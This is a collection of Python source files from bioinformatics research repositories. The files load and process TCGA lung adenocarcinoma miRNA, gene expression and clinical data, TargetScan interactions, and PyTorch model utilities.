avg_loss = torch.stack([x["test_loss"] for x in outputs]).mean().item()
if hasattr(self, "test_metrics"):
logs = self.test_metrics.compute_metrics()
self.test_metrics.reset_metrics()
else:
logs = {}
logs.update({"test_loss": avg_loss})
self.log_dict(logs, prog_bar=logs)
return None
def train_dataloader(self):
return self.dataset.train_dataloader(collate_fn=self.collate_fn, batch_size=self.hparams.batch_size)
def val_dataloader(self):
return self.dataset.valid_dataloader(collate_fn=self.collate_fn, batch_size=self.hparams.batch_size)
def valtrain_dataloader(self):
return self.dataset.valtrain_dataloader(collate_fn=self.collate_fn,
batch_size=self.hparams.batch_size)
def test_dataloader(self):
return self.dataset.test_dataloader(collate_fn=self.collate_fn, batch_size=self.hparams.batch_size)
def print_pred_class_counts(self, y_hat, y, multilabel, n_top_class=8):
if multilabel:
y_pred_dict = pd.Series(y_hat.sum(1).detach().cpu().type(torch.int).numpy()).value_counts().to_dict()
y_true_dict = pd.Series(y.sum(1).detach().cpu().type(torch.int).numpy()).value_counts().to_dict()
print(f"y_pred {len(y_pred_dict)} classes",
{str(k): v for k, v in itertools.islice(y_pred_dict.items(), n_top_class)})
print(f"y_true {len(y_true_dict)} classes",
{str(k): v for k, v in itertools.islice(y_true_dict.items(), n_top_class)})
else:
y_pred_dict = pd.Series(y_hat.argmax(1).detach().cpu().type(torch.int).numpy()).value_counts().to_dict()
y_true_dict = pd.Series(y.detach().cpu().type(torch.int).numpy()).value_counts().to_dict()
print(f"y_pred {len(y_pred_dict)} classes",
{str(k): v for k, v in itertools.islice(y_pred_dict.items(), n_top_class)})
print(f"y_true {len(y_true_dict)} classes",
{str(k): v for k, v in itertools.islice(y_true_dict.items(), n_top_class)})
def get_n_params(self):
size = 0
for name, param in dict(self.named_parameters()).items():
nn = 1
for s in list(param.size()):
nn = nn * s
size += nn
return size
```
#### File: JonnyTran/LATTE/utils.py
```python
import numpy as np
import torch
def filter_samples(Y_hat: torch.Tensor, Y: torch.Tensor, weights):
if weights is None:
return Y_hat, Y
if isinstance(weights, torch.Tensor):
idx = torch.nonzero(weights).view(-1)
else:
idx = torch.tensor(np.nonzero(weights)[0])
if Y.dim() > 1:
Y = Y[idx, :]
else:
Y = Y[idx]
if Y_hat.dim() > 1:
Y_hat = Y_hat[idx, :]
else:
Y_hat = Y_hat[idx]
return Y_hat, Y
def tensor_sizes(input):
if isinstance(input, dict):
return {k: tensor_sizes(v) for k, v in input.items()}
elif isinstance(input, tuple):
return tuple(tensor_sizes(v) for v in input)
elif isinstance(input, list):
return [tensor_sizes(v) for v in input]
else:
return input.shape
def preprocess_input(input, device, dtype=None, half=False):
if isinstance(input, dict):
input = {k: preprocess_input(v, device, dtype, half) for k, v in input.items()}
elif isinstance(input, tuple):
input = tuple(preprocess_input(v, device, dtype, half) for v in input)
elif isinstance(input, list):
input = [preprocess_input(v, device, dtype, half) for v in input]
else:
input = process_tensor(input, device=device, dtype=dtype, half=half)
return input
def process_tensor(input, device=None, dtype=None, half=False):
if not isinstance(input, torch.Tensor):
input = torch.tensor(input)
if dtype:
input = input.type(dtype)
if half:
input = input.half()
if device:
input = input.to(device)
return input
``` |
{
"source": "JonnyTran/microRNA-Lung-Cancer-Associations",
"score": 3
} |
#### File: src/data/make_dataset.py
```python
import os
import numpy as np
import pandas
from definitions import ROOT_DIR
from sklearn.feature_selection import SelectFdr, f_classif
class Target_Scan:
def __init__(self, mirna_list, gene_symbols, unique_mirna_group_no=False):
self.process_targetscan_mirna_family(mirna_list, unique_mirna_group_no=unique_mirna_group_no)
self.process_mirna_target_interactions(mirna_list, gene_symbols)
self.process_mirna_target_interactions_context_score(mirna_list, gene_symbols)
def process_targetscan_mirna_family(self, mirna_list, unique_mirna_group_no=False):
targetScan_family_df = pandas.read_table(os.path.join(ROOT_DIR, 'data/external/TargetScan_miR_Family_Info.txt'),
delimiter='\t')
targetScan_family_df = targetScan_family_df[targetScan_family_df['Species ID'] == 9606]
targetScan_family_df['MiRBase ID'] = targetScan_family_df['MiRBase ID'].str.lower()
targetScan_family_df['MiRBase ID'] = targetScan_family_df['MiRBase ID'].str.replace("-3p.*|-5p.*", "")
targetScan_family_df.drop_duplicates(inplace=True)
targetScan_family_df = targetScan_family_df[['miR family', 'MiRBase ID']]
in_family_mirnas_list = targetScan_family_df["MiRBase ID"].tolist()
self.mirna_family = list(targetScan_family_df["MiRBase ID"].groupby(targetScan_family_df["miR family"]))
self.mirna_family_names = [fam[0] for fam in self.mirna_family]
self.mirna_family = {fam[0]: fam[1].tolist() for fam in self.mirna_family}
self.mirna_family_assg = []
counter = 9999
for m in mirna_list:
if m in in_family_mirnas_list:
for k, v in self.mirna_family.iteritems():
if m in v:
m_family = k
break
self.mirna_family_assg.append(self.mirna_family_names.index(m_family))
else:
if unique_mirna_group_no:
while counter in range(0, len(self.mirna_family_names)):
counter += 1
self.mirna_family_assg.append(counter)
counter += 1
else:
self.mirna_family_assg.append(counter)
def process_mirna_target_interactions(self, mirna_list, gene_symbols):
# Load data frame from file
targetScan_df = pandas.read_table(
os.path.join(ROOT_DIR, 'data/external/TargetScan_Predicted_Targets_Info_default_predictions.tsv'),
delimiter='\t')
targetScan_family_df = pandas.read_table(os.path.join(ROOT_DIR, 'data/external/TargetScan_miR_Family_Info.txt'),
delimiter='\t')
# Select only homo sapiens miRNA-target pairs
targetScan_df = targetScan_df[targetScan_df["Species ID"] == 9606][["miR Family", "Gene Symbol"]]
targetScan_family_df = targetScan_family_df[targetScan_family_df['Species ID'] == 9606][
['miR family', 'MiRBase ID']]
# Use miRBase ID names
targetScan_family_df.rename(columns={'miR family': 'miR Family'}, inplace=True)
targetScan_df = pandas.merge(targetScan_df, targetScan_family_df, how='inner', on="miR Family")
targetScan_df = targetScan_df[["MiRBase ID", "Gene Symbol"]]
# Standardize miRNA names
targetScan_df['MiRBase ID'] = targetScan_df['MiRBase ID'].str.lower()
targetScan_df['MiRBase ID'] = targetScan_df['MiRBase ID'].str.replace("-3p.*|-5p.*", "")
targetScan_df.drop_duplicates(inplace=True)
# Filter miRNA-target pairs to only miRNA's included in miRNA expression data, same for gene targets
self.targetScan_df = targetScan_df[
targetScan_df['MiRBase ID'].isin(mirna_list) & targetScan_df['Gene Symbol'].isin(gene_symbols)]
def get_miRNA_family_group_assg(self):
return self.mirna_family_assg
def get_miRNA_target_interaction(self):
return self.targetScan_df
def get_miRNA_target_interaction_context(self):
return self.targetScan_context_df
def print_miRNA_family(self):
for m, m_assg in zip(tgca_luad.mirna_list, self.mirna_family_assg):
if m_assg < len(self.mirna_family_names):
fam = self.mirna_family_names[m_assg]
else:
fam = ""
print m, '\t\t', fam
def process_mirna_target_interactions_context_score(self, mirna_list, gene_symbols):
# Load data frame from file
targetScan_context_df = pandas.read_table(
os.path.join(ROOT_DIR, 'data/external/TargetScan_Predicted_Targets_Context_Scores.default_predictions.txt'),
delimiter='\t')
# Select only homo sapiens miRNA-target pairs
targetScan_context_df = targetScan_context_df[targetScan_context_df["Gene Tax ID"] == 9606][
["miRNA", "Gene Symbol"]]
# TODO Select only interactions with high context score
# Use miRBase ID names
targetScan_context_df.rename(columns={'miRNA': 'MiRBase ID'}, inplace=True)
# Standardize miRNA names
targetScan_context_df['MiRBase ID'] = targetScan_context_df['MiRBase ID'].str.lower()
targetScan_context_df['MiRBase ID'] = targetScan_context_df['MiRBase ID'].str.replace("-3p.*|-5p.*", "")
targetScan_context_df.drop_duplicates(inplace=True)
# Filter miRNA-target pairs to only miRNA's included in miRNA expression data, same for gene targets
self.targetScan_context_df = targetScan_context_df[
targetScan_context_df['MiRBase ID'].isin(mirna_list) & targetScan_context_df['Gene Symbol'].isin(
gene_symbols)]
class TCGA_LUAD:
def __init__(self):
pathologic_stage_map = {'Stage IA': 'Stage I', 'Stage IB': 'Stage I',
'Stage IIA': 'Stage II', 'Stage IIB': 'Stage II',
'Stage IIIA': 'Stage III', 'Stage IIIB': 'Stage III'}
histological_type_map = {'Lung Acinar Adenocarcinoma': 'Acinar',
'Lung Adenocarcinoma Mixed Subtype': 'Mixed Subtype',
'Lung Adenocarcinoma- Not Otherwise Specified (NOS)': 'NOS',
'Lung Bronchioloalveolar Carcinoma Mucinous': 'Bronchioloalveolar',
'Lung Bronchioloalveolar Carcinoma Nonmucinous': 'Bronchioloalveolar',
'Lung Clear Cell Adenocarcinoma': 'Clear Cell',
'Lung Micropapillary Adenocarcinoma': 'Micropapillary',
'Lung Papillary Adenocarcinoma': 'Papillary',
'Lung Mucinous Adenocarcinoma': 'Mucinous',
'Lung Signet Ring Adenocarcinoma': 'Signet Ring',
'Lung Solid Pattern Predominant Adenocarcinoma': 'Solid',
'Mucinous (Colloid) Carcinoma': 'Colloid'}
# miRNA
mirna_tumor_df = pandas.read_csv(os.path.join(ROOT_DIR, "data/processed/miRNA/tumor_miRNA.csv"))
mirna_normal_df = pandas.read_csv(os.path.join(ROOT_DIR, "data/processed/miRNA/normal_miRNA.csv"))
self.clinical_df = pandas.read_csv(os.path.join(ROOT_DIR, "data/processed/clinical/clinical.csv"))
self.mirna_normal = pandas.merge(self.clinical_df[['patient_barcode', 'pathologic_stage', 'histological_type']],
mirna_normal_df,
on='patient_barcode')
self.mirna_normal['pathologic_stage'] = 'normal'
self.mirna_tumor = pandas.merge(self.clinical_df[['patient_barcode', 'pathologic_stage', 'histological_type']],
mirna_tumor_df,
on='patient_barcode')
# Drop NA rows
self.mirna_tumor.dropna(axis=0, inplace=True)
self.mirna_normal.dropna(axis=0, inplace=True)
self.mirna_tumor.replace({'pathologic_stage': pathologic_stage_map}, inplace=True)
self.mirna_tumor.replace({'histological_type': histological_type_map}, inplace=True)
print self.mirna_tumor.columns
self.mirna_list = list(self.mirna_tumor.columns)[3:]
########################################### Gene Expression ####################################################
gene_tumor_df = pandas.read_table(
os.path.join(ROOT_DIR, 'data/processed/gene_expression/tumor/READ__illuminahiseq_rnaseqv2__GeneExp.txt'),
header=0, delimiter='\t')
gene_normal_df = pandas.read_table(
os.path.join(ROOT_DIR, 'data/processed/gene_expression/normal/READ__illuminahiseq_rnaseqv2__GeneExp.txt'),
header=0, delimiter='\t')
gene_tumor_df.rename(columns=lambda x: x[:12], inplace=True)
gene_normal_df.rename(columns=lambda x: x[:12], inplace=True)
# Remove entries with unknown Gene Symbol
gene_tumor_df = gene_tumor_df[gene_tumor_df.GeneSymbol != '?']
gene_normal_df = gene_normal_df[gene_normal_df.GeneSymbol != '?']
# Get list of all gene_symbols
self.gene_symbols = list(gene_tumor_df['GeneSymbol'])
# Get list of tumor and normal patient_barcode
gene_exp_tumor_patient_barcodes = list(gene_tumor_df.columns)[2:]
gene_exp_normal_patient_barcodes = list(gene_normal_df.columns)[2:]
# Drop EntrezID column
self.gene_tumor = gene_tumor_df.drop(['EntrezID', 'GeneSymbol'], axis=1)
self.gene_normal = gene_normal_df.drop(['EntrezID', 'GeneSymbol'], axis=1)
# Reshaping data frame to have columns for GeneSymbols, and rows of patients
self.gene_tumor = self.gene_tumor.T
self.gene_normal = self.gene_normal.T
self.gene_tumor.columns = self.gene_symbols
self.gene_normal.columns = self.gene_symbols
# Add column for patients barcode
self.gene_tumor['patient_barcode'] = self.gene_tumor.index
self.gene_normal['patient_barcode'] = self.gene_normal.index
# Drop NA rows
self.gene_tumor.dropna(axis=0, inplace=True)
self.gene_normal.dropna(axis=0, inplace=True)
self.gene_normal = pandas.merge(self.clinical_df[['patient_barcode', 'pathologic_stage', 'histological_type']],
self.gene_normal,
on='patient_barcode')
self.gene_normal['pathologic_stage'] = 'normal'
self.gene_tumor = pandas.merge(self.clinical_df[['patient_barcode', 'pathologic_stage', 'histological_type']],
self.gene_tumor,
on='patient_barcode')
self.gene_tumor.replace({'pathologic_stage': pathologic_stage_map}, inplace=True)
self.gene_tumor.replace({'histological_type': histological_type_map}, inplace=True)
print self.gene_tumor['histological_type'].value_counts().sort_index(axis=0)
# Drop duplicate columns names (Gene symbols with same name)
_, i = np.unique(self.gene_tumor.columns, return_index=True)
self.gene_tumor = self.gene_tumor.iloc[:, i]
self.gene_normal = self.gene_normal.iloc[:, i]
print 'mirna_tumor', self.mirna_tumor.shape
print 'mirna_normal', self.mirna_normal.shape
print 'gene_tumor', self.gene_tumor.shape
print 'gene_normal', self.gene_normal.shape
def gene_univariate_feature_selection(self, alpha=0.01):
gene_normal_X, gene_normal_Y = self.make_dataset(dataset='gene', normal_tumor='normal',
normal_matched=True, mirna_gene_matched=True)
gene_tumor_X, gene_tumor_Y = self.make_dataset(dataset='gene', normal_tumor='tumor', normal_matched=True,
mirna_gene_matched=True)
gene_exp_filter = SelectFdr(f_classif, alpha=alpha)
gen_exp_new = gene_exp_filter.fit_transform(X=pandas.concat([gene_normal_X, gene_tumor_X]),
y=pandas.concat([gene_normal_Y, gene_tumor_Y]))
self.gene_symbols = np.asanyarray(self.gene_symbols)[gene_exp_filter.get_support(indices=True)].tolist()
self.gene_tumor = self.gene_tumor[
self.gene_symbols + ['patient_barcode', 'pathologic_stage', 'histological_type']]
self.gene_normal = self.gene_normal[
self.gene_symbols + ['patient_barcode', 'pathologic_stage', 'histological_type']]
def make_dataset(self, dataset="miRNA", normal_tumor='both', pathologic_stages=[], histological_types=[],
normal_matched=True,
mirna_gene_matched=True, stage_label_mapping=None, zero_mean=False, normalize=False):
"""
:param dataset:
:param normal_tumor:
:param pathologic_stages:
:param histological_types:
:param normal_matched:
:param mirna_gene_matched:
:param stage_label_mapping:
:param zero_mean:
:param normalize:
:return:
"""
# Find patients with both tumor and normal samples
if normal_matched:
if dataset is "miRNA":
patients = pandas.merge(self.mirna_tumor[['patient_barcode']],
self.mirna_normal[['patient_barcode']],
on='patient_barcode')
elif dataset is "gene":
patients = pandas.merge(self.gene_tumor[['patient_barcode']],
self.gene_normal[['patient_barcode']],
on='patient_barcode')
elif not normal_matched:
if dataset is "miRNA":
patients = pandas.concat([self.mirna_tumor[['patient_barcode']],
self.mirna_normal[['patient_barcode']]]).drop_duplicates()
elif dataset is "gene":
patients = pandas.concat([self.gene_tumor[['patient_barcode']],
self.gene_normal[['patient_barcode']]]).drop_duplicates()
# Find patients with matching miRNA and gene samples
if mirna_gene_matched and normal_matched:
patients_normal = pandas.merge(self.mirna_normal[['patient_barcode']],
self.gene_normal[['patient_barcode']],
on='patient_barcode')
patients_tumor = pandas.merge(self.mirna_tumor[['patient_barcode']],
self.gene_tumor[['patient_barcode']],
on='patient_barcode')
patients = pandas.merge(patients_normal, patients_tumor, on='patient_barcode')
elif mirna_gene_matched and not normal_matched:
if normal_tumor is "normal":
patients = pandas.merge(self.mirna_normal[['patient_barcode']],
self.gene_normal[['patient_barcode']],
on='patient_barcode')
elif normal_tumor is "tumor":
patients = pandas.merge(self.mirna_tumor[['patient_barcode']],
self.gene_tumor[['patient_barcode']],
on='patient_barcode')
# Return dataset, and perform pathologic stage relabling
if dataset is 'miRNA':
if normal_tumor is 'both':
return self.dataFrame_to_matrix(pandas.concat([self.mirna_tumor, self.mirna_normal]), patients,
pathologic_stages, histological_types, stage_label_mapping, zero_mean,
normalize)
elif normal_tumor is 'normal':
return self.dataFrame_to_matrix(self.mirna_normal, patients,
pathologic_stages, histological_types, stage_label_mapping, zero_mean,
normalize)
elif normal_tumor is 'tumor':
return self.dataFrame_to_matrix(self.mirna_tumor, patients,
pathologic_stages, histological_types, stage_label_mapping, zero_mean,
normalize)
elif dataset is 'gene':
if normal_tumor is 'both':
return self.dataFrame_to_matrix(pandas.concat([self.gene_tumor, self.gene_normal]), patients,
pathologic_stages, histological_types, stage_label_mapping, zero_mean,
normalize)
elif normal_tumor is 'normal':
return self.dataFrame_to_matrix(self.gene_normal, patients,
pathologic_stages, histological_types, stage_label_mapping, zero_mean,
normalize)
elif normal_tumor is 'tumor':
return self.dataFrame_to_matrix(self.gene_tumor, patients,
pathologic_stages, histological_types, stage_label_mapping, zero_mean,
normalize)
def dataFrame_to_matrix(self, data, patients, pathologic_stages, histological_types, stage_label_mapping,
zero_mean=False, normalize=False):
df = data[data['patient_barcode'].isin(patients['patient_barcode'])]
if pathologic_stages:
df = df[df['pathologic_stage'].isin(pathologic_stages)]
if histological_types:
df = df[df['histological_type'].isin(histological_types)]
if stage_label_mapping:
df['pathologic_stage'] = df['pathologic_stage'].replace(stage_label_mapping)
X = df.drop(['patient_barcode', 'pathologic_stage', 'histological_type'], axis=1)
y = df['pathologic_stage']
if normalize:
for col in X.columns:
X[col] = (X[col] - X[col].mean()) / X[col].std(0)
elif zero_mean:
for col in X.columns:
X[col] = X[col] - X[col].mean()
return X, y
def get_miRNA_list(self):
return self.mirna_list
def get_gene_list(self):
return self.gene_symbols
if __name__ == '__main__':
tgca_luad = TCGA_LUAD()
# pathologic_stage_map = {'Stage I': 1, 'Stage II': 1}
X, y = tgca_luad.make_dataset(dataset='miRNA', normal_tumor='tumor', normal_matched=False, mirna_gene_matched=True,
pathologic_stages=[])
print "X", X.shape
print "y", y.shape
print tgca_luad.make_dataset(dataset='gene', normal_tumor='tumor', normal_matched=False, mirna_gene_matched=True)[
0].shape
```
#### File: src/features/genomicdata.py
```python
import os
import numpy as np
import pandas as pd
from definitions import ROOT_DIR
class GenomicData(object):
def __init__(self, cancer_type, file_path, columns="GeneSymbol|TCGA", log2_transform=True):
self.cancer_type = cancer_type
self.data = self.preprocess_expression_table(pd.read_table(file_path, sep="\t"), columns)
if log2_transform:
self.data = self.data.applymap(self.log2_transform)
# Save samples and features for this omics data
self.samples = self.data.index
self.features = self.data.columns.tolist()
# self.features.remove("bcr_sample_barcode")
def preprocess_expression_table(self, df, columns):
"""
Download
:param df:
:param columns:
:return:
"""
table = df
# Filter columns
table = table.filter(regex=columns)
# Cut TCGA column names to sample barcode
table.rename(columns=lambda x: x[:16] if ("TCGA" in x) else x, inplace=True)
# Drop duplicate columns names (Gene symbols with same name)
_, i = np.unique(table.columns, return_index=True)
table = table.iloc[:, i]
# Drop NA GeneSymbol rows
table.dropna(axis=0, inplace=True)
# Remove entries with unknown Gene Symbol
table = table[table.GeneSymbol != '?']
# Transpose dataframe to patient rows and GeneSymbol columns
table.index = table.GeneSymbol
table.drop(['GeneSymbol'], axis=1, inplace=True)
table = table.T
# Add column for patients barcode
# table['bcr_sample_barcode'] = table.index
# Drop duplicate columns names (Gene symbols with same name)
_, i = np.unique(table.columns, return_index=True)
table = table.iloc[:, i]
return table
def log2_transform(self, x):
return np.log2(x+1)
def get_genes_list(self):
return self.features
def get_samples_list(self):
return self.samples
class LncRNAExpression(GenomicData):
def __init__(self, cancer_type, folder_path):
file_path = os.path.join(folder_path, "TCGA-rnaexpr.tsv")
super(LncRNAExpression, self).__init__(cancer_type, file_path)
def preprocess_expression_table(self, df, columns):
lncrna_exp = df
lncrna_names = pd.read_table(
os.path.join(ROOT_DIR, "data/tcga-assembler/LUAD/lncrna/HGNC_RNA_long_non-coding.txt"),
delimiter="\t")
lncrna_dict = pd.Series(lncrna_names.symbol.values, index=lncrna_names.ensembl_gene_id).to_dict()
# Replacing ENSG Gene ID to the lncRNA symbol name
lncrna_exp['Gene_ID'] = lncrna_exp['Gene_ID'].str.replace("[.].*", "")
lncrna_exp.replace({"Gene_ID": lncrna_dict}, inplace=True)
# Drop NA gene rows
lncrna_exp.dropna(axis=0, inplace=True)
# Transpose matrix to patients rows and genes columns
lncrna_exp.index = lncrna_exp['Gene_ID']
lncrna_exp = lncrna_exp.T.iloc[1:, :]
# Change index string to bcr_sample_barcode standard
def change_patient_barcode(s):
if "Normal" in s:
return s[s.find('TCGA'):] + "-11A"
elif "Tumor" in s:
return s[s.find('TCGA'):] + "-01A"
else:
return s
lncrna_exp.index = lncrna_exp.index.map(change_patient_barcode)
return lncrna_exp
class GeneExpression(GenomicData):
def __init__(self, cancer_type, folder_path):
file_path = os.path.join(folder_path, "geneExp.txt")
super(GeneExpression, self).__init__(cancer_type, file_path)
class SNP(GenomicData):
def __init__(self, cancer_type, folder_path):
file_path = os.path.join(folder_path, "somaticMutation_geneLevel.txt")
super(SNP, self).__init__(cancer_type, file_path)
class miRNAExpression(GenomicData):
def __init__(self, cancer_type, folder_path):
file_path = os.path.join(folder_path, "miRNAExp__RPM.txt")
super(miRNAExpression, self).__init__(cancer_type, file_path)
class CopyNumberVariation(GenomicData):
def __init__(self, cancer_type, folder_path):
file_path = os.path.join(folder_path, "copyNumber.txt")
super(CopyNumberVariation, self).__init__(cancer_type, file_path)
class DNAMethylation(GenomicData):
def __init__(self, cancer_type, folder_path):
file_path = os.path.join(folder_path, "")
super(DNAMethylation, self).__init__(cancer_type, file_path)
class ProteinExpression(GenomicData):
def __init__(self, cancer_type, folder_path):
file_path = os.path.join(folder_path, "protein_RPPA.txt")
super(ProteinExpression, self).__init__(cancer_type, file_path)
if __name__ == '__main__':
# table = pd.read_table(ROOT_DIR+"/data/tcga-assembler/LUAD/clinical/nationwidechildrens.org_clinical_patient_luad.txt", sep="\t")
folder_path = "/data/tcga-assembler/LUAD/lncrna/"
lncRNA_expression = LncRNAExpression(cancer_type="LUAD", folder_path=ROOT_DIR + folder_path)
```
#### File: src/utils/validate_candidate_miRNAs.py
```python
import os
from operator import itemgetter
from definitions import ROOT_DIR
VALIDATION_FILE_PATH = os.path.join(ROOT_DIR, 'data/external/TarBase_Experiment_Valid_miRNA-Targets.csv')
def recall_rate(candidate_miRNAs, validated_miRNAs):
"""
Measures recall rate. Percent of candidate miRNA's selected, in validated miRNA's
:param candidate_miRNAs: a list of selected miRNAs code names
:param validated_miRNAs: a list of validated miRNAs code names
:return: a percentage
"""
if len(candidate_miRNAs) == 0:
return None
return float(len(intersection_miRNA(candidate_miRNAs, validated_miRNAs))) / len(validated_miRNAs)
def precision_rate(candidate_miRNAs, validated_miRNAs):
"""
Measures precision rate. Percent of validated miRNA's selected, in candidate miRNA's
:param candidate_miRNAs: a list of selected miRNAs code names
:param validated_miRNAs: a list of validated miRNAs code names
:return: a percentage
"""
if len(candidate_miRNAs) == 0:
return None
return float(len(intersection_miRNA(candidate_miRNAs, validated_miRNAs))) / len(candidate_miRNAs)
def intersection_miRNA(candidate_miRNAs, validated_miRNAs):
return set(candidate_miRNAs) & set(validated_miRNAs)
def get_miRNA_names(indices, mirna_list, miR_name=False):
if miR_name:
result = list(itemgetter(*indices)(mirna_list))
for i in range(len(result)):
result[i] = result[i].replace('hsa-', '')
return result
return itemgetter(*indices)(mirna_list)
``` |
{
"source": "JonnyTran/nuclei-segmentation",
"score": 3
} |
#### File: src/features/associations.py
```python
import os
from definitions import ROOT_DIR
import numpy as np
import pandas as pd
import networkx as nx
import dask.dataframe as dd
from dask.multiprocessing import get
from src.features.genomicdata import GenomicData
class Association():
def __init__(self, A: GenomicData, B: GenomicData, C, bi_direction=False):
self.A = A
self.B = B
self.C = C
self.W = nx.DiGraph()
def fit(self, putative_assocs, map_function, n_jobs=4):
edges_added = 0
if putative_assocs is not None:
putative_dd = dd.from_pandas(putative_assocs, npartitions=n_jobs)
res = putative_dd.map_partitions(map_function, meta=putative_dd).compute(get=get)
for res_partition in res:
for tup in res_partition:
self.W.add_edge(tup[0], tup[1], dys=tup[2])
edges_added += 1
return edges_added
def calc_dys_A_B(df, miRNA_A, miRNA_B, gene_A, gene_B):
result = []
for row in df.iterrows():
m = row[1]['MiRBase ID']
t = row[1]['Gene Symbol']
miRNA_gene_A_corr = np.dot(miRNA_A[m] - np.mean(miRNA_A[m]),
gene_A[t] - np.mean(gene_A[t])) / \
((n_A - 1) * np.std(miRNA_A[m]) * np.std(gene_A[t]))
miRNA_gene_B_corr = np.dot(miRNA_B[m] - np.mean(miRNA_B[m]),
gene_B[t] - np.mean(gene_B[t])) / \
((n_B - 1) * np.std(miRNA_B[m]) * np.std(gene_B[t]))
dys = miRNA_gene_A_corr - miRNA_gene_B_corr
p_value = self.z_to_p_value(self.fisher_r_to_z(miRNA_gene_A_corr, n_A, miRNA_gene_B_corr, n_B))
if p_value <= p_threshold and (miRNA_gene_A_corr < 0 or miRNA_gene_B_corr < 0):
result.append((m, t, p_value))
return result
``` |
{
"source": "JonnyTran/open-omics",
"score": 3
} |
#### File: open-omics/openomics/clinical.py
```python
import io
import os
from typing import List, Union
import dask.dataframe as dd
import pandas as pd
import validators
from .utils import get_pkg_data_filename
BCR_PATIENT_BARCODE_COL = "bcr_patient_barcode"
HISTOLOGIC_SUBTYPE_COL = "histologic_subtype"
PATHOLOGIC_STAGE_COL = "pathologic_stage"
TUMOR_NORMAL_COL = 'tumor_normal'
PREDICTED_SUBTYPE_COL = 'predicted_subtype'
TUMOR = "Tumor"
NORMAL = "Normal"
class ClinicalData:
"""This class manages the clinical data tables to handle the patient's
phenotype data, as well as the treatment, and sample data associated to each
patient.
"""
pathologic_stage_map = {'Stage IA': 'Stage I', 'Stage IB': 'Stage I',
'Stage IIA': 'Stage II', 'Stage IIB': 'Stage II',
'Stage IIIA': 'Stage III', 'Stage IIIB': 'Stage III'}
def __init__(self,
file: Union[str, io.StringIO, pd.DataFrame, dd.DataFrame],
patient_index: str,
columns: List[str] = None):
"""
Args:
file (str, io.StringIO, pd.DataFrame): either a path to the
patients clinical data file, or a DataFrame.
patient_index (str): the patient's ID column name
columns (List[str]): default None. Specifies the columns to import,
if None, then import all columns.
"""
# self.cohort_name = cohort_name
self.patient_column = patient_index
if columns and patient_index not in columns:
columns.append(patient_index)
if isinstance(file, (pd.DataFrame, dd.DataFrame)):
self.patient = file
elif isinstance(file, io.StringIO):
file.seek(0) # Needed since the file was previous read to extract columns information
self.patient = pd.read_table(file,
skiprows=[1, 2],
na_values=["[Not Available]", "[Unknown]", "[Not Applicable]",
"[Discrepancy]"],
usecols=columns
)
elif isinstance(file, str) and validators.url(file):
dataurl, filename = os.path.split(file)
file = get_pkg_data_filename(dataurl + "/", filename)
self.patient = pd.read_table(file)
elif isinstance(file, str) and os.path.isfile(file):
self.patient = pd.read_table(file,
skiprows=[1, 2],
na_values=["[Not Available]", "[Unknown]", "[Not Applicable]",
"[Discrepancy]"],
usecols=columns
)
else:
raise FileNotFoundError("{}".format(file))
self.patient_barcodes = self.patient[patient_index].tolist()
self.patient.set_index(patient_index, inplace=True)
# Rename columns
self.patient.rename({"ajcc_pathologic_tumor_stage": PATHOLOGIC_STAGE_COL,
"histological_type": HISTOLOGIC_SUBTYPE_COL,
"histologic_diagnosis.1": HISTOLOGIC_SUBTYPE_COL}, axis=1, inplace=True)
self.patient.replace({PATHOLOGIC_STAGE_COL: ClinicalData.pathologic_stage_map}, inplace=True)
@classmethod
def name(self):
"""Returns the name of the class, i.e. 'ClinicalData'"""
return self.__class__.__name__
def build_clinical_samples(self, all_samples, index="bcr_patient_barcode"):
"""Build table with samples clinical data from patients :param
all_samples:
Args:
all_samples:
index:
"""
self.samples = pd.DataFrame(index=all_samples)
self.samples.index.name = index
self.samples.index = self.samples.index.str[:-4] # Cut sample barcode for TCGA
num_samples = self.samples.shape[0]
# Merge patients clinical data with patient barcode as index
# target = pd.merge(target, self.patient,
# how="left", left_on="patient_barcode", right_on="patient_barcode")
self.samples = self.samples.join(self.patient, on=index, how="left", rsuffix="_")
if self.samples.shape[0] != num_samples:
raise Exception("Clinical data merging has wrong number of samples")
# self.samples.dropna(axis=0, subset=["bcr_patient_barcode"], inplace=True) # Remove samples without clinical data
self.samples = self.samples[self.samples[PATHOLOGIC_STAGE_COL] != "[Discrepancy]"]
self.samples.loc[self.samples.index.str.contains(
"-11"), TUMOR_NORMAL_COL] = NORMAL # Change stage label of normal samples to "Normal"
self.samples.loc[self.samples.index.str.contains(
"-01"), TUMOR_NORMAL_COL] = TUMOR # Change stage label of normal samples to "Normal"
def add_drug_response_data(self, file_path="nationwidechildrens.org_clinical_drug.txt",
patient_column="bcr_patient_barcode",
columns=None,
drug_name_col=None, response_column=None):
"""
Args:
file_path:
patient_column:
columns:
drug_name_col:
response_column:
"""
if columns is None:
columns = ['bcr_patient_barcode', 'pharmaceutical_therapy_drug_name',
'pharmaceutical_therapy_type', 'treatment_best_response']
if not os.path.exists(file_path):
raise FileNotFoundError(file_path)
self.drug_name_col = drug_name_col
self.response_column = response_column
self.drugs = pd.read_table(file_path,
sep="\t",
skiprows=[1, 2],
na_values=["[Not Available]", "[Unknown]", "[Not Applicable]"],
usecols=columns
)
self.drugs.set_index(patient_column, inplace=True)
def add_biospecimen_data(self, file_path="genome.wustl.edu_biospecimen_sample.txt",
patient_col_name="bcr_patient_barcode",
columns=['bcr_sample_barcode', 'sample_type']):
"""
Args:
file_path:
patient_col_name:
columns:
"""
if not os.path.exists(file_path):
raise FileNotFoundError(file_path)
self.biospecimen = pd.read_table(file_path, sep="\t", skiprows=[1, ],
na_values=["[Not Available]", "[Unknown]", "[Not Applicable]"],
usecols=columns
)
self.sample_barcodes = self.biospecimen[patient_col_name].tolist()
self.biospecimen.set_index(patient_col_name, inplace=True)
def get_patient_barcodes(self):
return self.patient_barcodes
def get_sample_barcodes(self):
return self.sample_barcodes
# class DrugResponse():
# def __init__(self, drugs_file_path="nationwidechildrens.org_clinical_drug.txt", patient_column="bcr_patient_barcode",
# columns=['bcr_patient_barcode', 'pharmaceutical_therapy_drug_name', 'pharmaceutical_therapy_type', 'treatment_best_response'],
# drug_name_col=None, response_column=None):
# self.drug_name_col = drug_name_col
# self.response_column = response_column
#
# self.drugs = pd.read_table(drugs_file_path,
# sep="\t",
# skiprows=[1, 2],
# na_values=["[Not Available]", "[Unknown]", "[Not Applicable]"],
# usecols=columns
# )
# self.drugs.set_index(patient_column, inplace=True)
# class Biospecimen():
# def __init__(self, biospecimens_file="genome.wustl.edu_biospecimen_sample.txt", patient_col_name="bcr_patient_barcode",
# columns=['bcr_sample_barcode', 'sample_type']):
